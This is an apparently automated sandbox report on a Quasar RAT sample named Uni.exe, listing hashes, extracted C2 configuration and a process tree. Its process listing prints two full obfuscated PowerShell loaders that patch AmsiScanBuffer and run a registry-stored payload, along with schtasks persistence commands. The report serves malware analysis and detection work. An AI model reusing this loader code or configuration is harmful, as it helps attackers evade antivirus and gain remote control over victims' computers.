Analysis
-
max time kernel
1800s -
max time network
1789s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
-
submitted
08/05/2024, 17:28
General
-
Target
Uni.exe
-
Size
409KB
-
MD5
7417c8c73e614f293152575f46134216
-
SHA1
cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805
-
SHA256
00c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3
-
SHA512
897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0
-
SSDEEP
6144:nMr2pJAJcC0B632U3GRbMfgvKFFhTEDPX1NbKoEn5MSU+h2f8/14m:LpyJcC+82U3GRGGp1M5Ys2f8/6m
Score
10/10
Malware Config
Extracted
Family
quasar
Version
3.1.5
Botnet
SLAVE
C2
even-lemon.gl.at.ply.gg:33587
Mutex
$Sxr-dOMA5C0pQTTpKjVsCp
Attributes
-
encryption_key
UBXs44u6E81wxBGZxQHk
-
install_name
$sxr-powershell.exe
-
log_directory
$SXR-KEYLOGS
-
reconnect_delay
3000
-
startup_key
$sxr-powershell
-
subdirectory
$sxr-seroxen2
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 16 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{c40d6ff2-e818-49f0-a56b-2b1ffbe07ea5}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{2ed3ec06-3818-4543-ba68-17a489e2362b}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
- Drops file in System32 directory
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:SRXMIHCSkCIB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vgUFJbayVmqshx,[Parameter(Position=1)][Type]$JhwfwApowY)$sqHlAhREqYB=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+'f'+''+[Char](108)+'e'+[Char](99)+'ted'+[Char](68)+''+[Char](101)+''+[Char](108)+'eg'+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+'m'+''+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'ule',$False).DefineType(''+[Char](77)+''+[Char](121)+'Dele'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+[Char](84)+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+'la'+[Char](115)+''+[Char](115)+','+'P'+''+'u'+'bl'+'i'+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+''+[Char](100)+','+[Char](65)+'n'+'s'+''+'i'+'C'+'l'+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$sqHlAhREqYB.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+','+[Char](72)+'i'+'d'+'e'+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+','+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$vgUFJbayVmqshx).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+'a'+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+'d');$sqHlAhREqYB.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+'o'+'k'+[Char](101)+'',''+'P'+'u'+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+','+'N'+''+[Char](101)+''+'w'+''+[Char](83)+'l'+[Char](111)+'t,'+[Char](86)+''+[Char](105)+''+'r'+'t'+'u'+''+[Char](97)+''+'l'+'',$JhwfwApowY,$vgUFJbayVmqshx).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+'a'+[Char](110)+'a'+'g'+''+[Char](101)+'d');Write-Output $sqHlAhREqYB.CreateType();}$fgoHRaScHykbp=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+''+'t'+''+'e'+''+'m'+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+'ic'+[Char](114)+'o'+[Char](115)+''+[Char](111)+'f'+[Char](116)+'.'+[Char](87)+''+'i'+''+[Char](110)+'3'+'2'+''+[Char](46)+'Un'+'s'+''+[Char](97)+''+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+[Char](105)+''+[Char](118)+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+''+'s'+'');$XoLUcKuitLhlFZ=$fgoHRaScHykbp.GetMethod(''+[Char](71)+''+'e'+''+'t'+'Pr'+[Char](111)+''+[Char](99)+''+[Char](65)+''+'d'+'d'+'r'+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+','+[Char](83)+'t'+[Char](97)+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RhUsMUdfdaDLafYrdLp=SRXMIHCSkCIB @([String])([IntPtr]);$eFRSRwBcGZUreYFZgXlSjS=SRXMIHCSkCIB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$McivxpKPkkK=$fgoHRaScHykbp.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'M'+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+'e'+'H'+''+[Char](97)+'n'+'d'+''+'l'+'e').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+'ne'+[Char](108)+''+[Char](51)+''+'2'+''+[Char](46)+'d'+[Char](108)+'l')));$EdDyTdnrRDOGyy=$XoLUcKuitLhlFZ.Invoke($Null,@([Object]$McivxpKPkkK,[Object]('L'+[Char](111)+'a'+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+''+'r'+'y'+[Char](65)+'')));$hOBMPBAqVwRvEXDfA=$XoLUcKuitLhlFZ.Invoke($Null,@([Object]$McivxpKPkkK,[Object](''+[Char](86)+'i'+'r'+''+'t'+''+'u'+''+[Char](97)+'l'+'P'+'r'+[Char](111)+''+[Char](116)+''+[Char](101)+'c'+'t'+'')));$cgnXEFn=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EdDyTdnrRDOGyy,$RhUsMUdfdaDLafYrdLp).Invoke(''+'a'+''+'m'+''+'s'+''+'i'+''+[Char](46)+''+'d'+''+'l'+''+'l'+'');$rZFCbzzCbmsPiTplw=$XoLUcKuitLhlFZ.Invoke($Null,@([Object]$cgnXEFn,[Object](''+[Char](65)+'m'+'s'+''+[Char](105)+''+[Char](83)+'c'+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$cOnJjPDveQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hOBMPBAqVwRvEXDfA,$eFRSRwBcGZUreYFZgXlSjS).Invoke($rZFCbzzCbmsPiTplw,[uint32]8,4,[ref]$cOnJjPDveQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$rZFCbzzCbmsPiTplw,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hOBMPBAqVwRvEXDfA,$eFRSRwBcGZUreYFZgXlSjS).Invoke($rZFCbzzCbmsPiTplw,[uint32]8,0x20,[ref]$cOnJjPDveQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+'W'+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+'s'+[Char](116)+''+'a'+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:iClnMRoghVGC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$aAglCGrraFiCPu,[Parameter(Position=1)][Type]$BahUwIjOZa)$zXgXzHzdDcg=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+'e'+''+[Char](103)+''+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+'m'+[Char](111)+''+'r'+'y'+[Char](77)+'od'+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+'e'+[Char](84)+''+[Char](121)+''+'p'+'e',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+','+[Char](65)+'n'+[Char](115)+'iC'+[Char](108)+''+[Char](97)+'s'+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+'toC'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$zXgXzHzdDcg.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+'p'+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+'N'+''+[Char](97)+''+[Char](109)+''+'e'+''+[Char](44)+'Hi'+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+'g'+[Char](44)+'Pu'+[Char](98)+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$aAglCGrraFiCPu).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e,Man'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$zXgXzHzdDcg.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+'k'+'e',''+'P'+''+'u'+'b'+'l'+''+'i'+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+'g'+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+''+[Char](108)+'o'+[Char](116)+''+','+'Vi'+[Char](114)+'t'+[Char](117)+''+[Char](97)+'l',$BahUwIjOZa,$aAglCGrraFiCPu).SetImplementationFlags(''+'R'+'unti'+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+'a'+[Char](103)+'e'+[Char](100)+'');Write-Output $zXgXzHzdDcg.CreateType();}$bTLRhLRuWnVzI=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+'t'+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+'.'+[Char](87)+''+'i'+''+[Char](110)+''+'3'+''+'2'+'.U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+'t'+[Char](105)+'ve'+[Char](77)+'eth'+[Char](111)+'ds');$oLpQJqSqaKhDLU=$bTLRhLRuWnVzI.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'P'+''+[Char](114)+''+'o'+''+[Char](99)+''+'A'+''+[Char](100)+'dre'+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'ub'+[Char](108)+'i'+'c'+''+[Char](44)+''+'S'+'ta'+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$CnqKHkKaEjPBDnboxfJ=iClnMRoghVGC @([String])([IntPtr]);$EubakbJwECtEDjVOwjkAAS=iClnMRoghVGC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ZCkhRAIxogQ=$bTLRhLRuWnVzI.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'Ha'+'n'+''+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+'e'+'l'+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')));$kJrJQVJhOOwBrD=$oLpQJqSqaKhDLU.Invoke($Null,@([Object]$ZCkhRAIxogQ,[Object](''+[Char](76)+''+'o'+'a'+[Char](100)+''+[Char](76)+'i'+[Char](98)+''+'r'+''+'a'+''+[Char](114)+'y'+'A'+'')));$DXJHMbtgJopyetHDG=$oLpQJqSqaKhDLU.Invoke($Null,@([Object]$ZCkhRAIxogQ,[Object]('V'+'i'+''+[Char](114)+'tu'+[Char](97)+''+'l'+'P'+[Char](114)+'o'+'t'+'e'+[Char](99)+''+[Char](116)+'')));$HhpodMZ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kJrJQVJhOOwBrD,$CnqKHkKaEjPBDnboxfJ).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+''+'l'+''+'l'+'');$mIOiWjGzSxsHIFBCe=$oLpQJqSqaKhDLU.Invoke($Null,@([Object]$HhpodMZ,[Object]('Ams'+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+'n'+''+'B'+''+'u'+''+[Char](102)+''+[Char](102)+''+'e'+'r')));$jpuIdvQmWZ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DXJHMbtgJopyetHDG,$EubakbJwECtEDjVOwjkAAS).Invoke($mIOiWjGzSxsHIFBCe,[uint32]8,4,[ref]$jpuIdvQmWZ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$mIOiWjGzSxsHIFBCe,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DXJHMbtgJopyetHDG,$EubakbJwECtEDjVOwjkAAS).Invoke($mIOiWjGzSxsHIFBCe,[uint32]8,0x20,[ref]$jpuIdvQmWZ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+'E').GetValue('$'+[Char](55)+''+[Char](55)+'s'+[Char](116)+'a'+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\sihost.exesihost.exe2⤵
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Uni.exe"C:\Users\Admin\AppData\Local\Temp\Uni.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"3⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Uni.exe'" /sc onlogon /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵
-
C:\Windows\System32\InstallAgent.exeC:\Windows\System32\InstallAgent.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
Filesize
409KB
MD57417c8c73e614f293152575f46134216
SHA1cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805
SHA25600c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3
SHA512897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
338B
MD516581547ab79fb83a82d9b1fd6ebbe25
SHA160b3147772e256876a3ed75cef21b5a8cf85a438
SHA256cc5a3f5146f9d7a9502df4758b459c5de81a0d158b44c33cd64a4305a13fbaf9
SHA5126f0d0fb77591df3d2a7c1749d9630e885b23a34b1a367952262d254d3ea4c749814a5e0058c45185829ba7e58356b5cb21a03ead7cce9f1f3121c266071f391e
-
Filesize
412B
MD552ba05284c509a6d3ffbaad68e7ab70c
SHA1ad48e87b91a9d2b45388bf120d62c13a9198e9e8
SHA256bfa99f27c7a189bfe553664384a5cc2d8e162e2ebfd569c4f61419addd5bcc14
SHA512d9db208deb3d4c3aebf0c087249f1398800fbb1324f05742505d5f7e091696862065fa58d540cd1e69d9a2e9f6f6acc4612a0112bd6a2944badcd37f2a4941fc
-
Filesize
3KB
MD556efdb5a0f10b5eece165de4f8c9d799
SHA1fa5de7ca343b018c3bfeab692545eb544c244e16
SHA2566c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
SHA51291e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc
-
Filesize
1KB
MD5efe0903424c927d3611f8d8acd078b79
SHA122fda4e644f8fa0908493f40b930b1dff1755356
SHA25679fc6c6c41514007fa27978e5313312789718489126594f603a4a325153114d6
SHA5128de645327a416095eae442471a8b4f0b27c60dd424545ebb9f9708a412b6f7d0635ef3069e1663db3dd2bfe5882040c25a1af10d12a2eed4bf8340fd401f8de9
-
Filesize
148KB
-
Filesize
64KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
64KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
64KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
64KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
32KB
-
Filesize
696KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
1.9MB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
40KB
-
Filesize
136KB
-
Filesize
472KB
-
Filesize
1.9MB
-
Filesize
168KB
-
Filesize
696KB
-
Filesize
408KB
-
Filesize
72KB
-
Filesize
248KB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
584KB
-
Filesize
4KB
-
Filesize
5.0MB
-
Filesize
432KB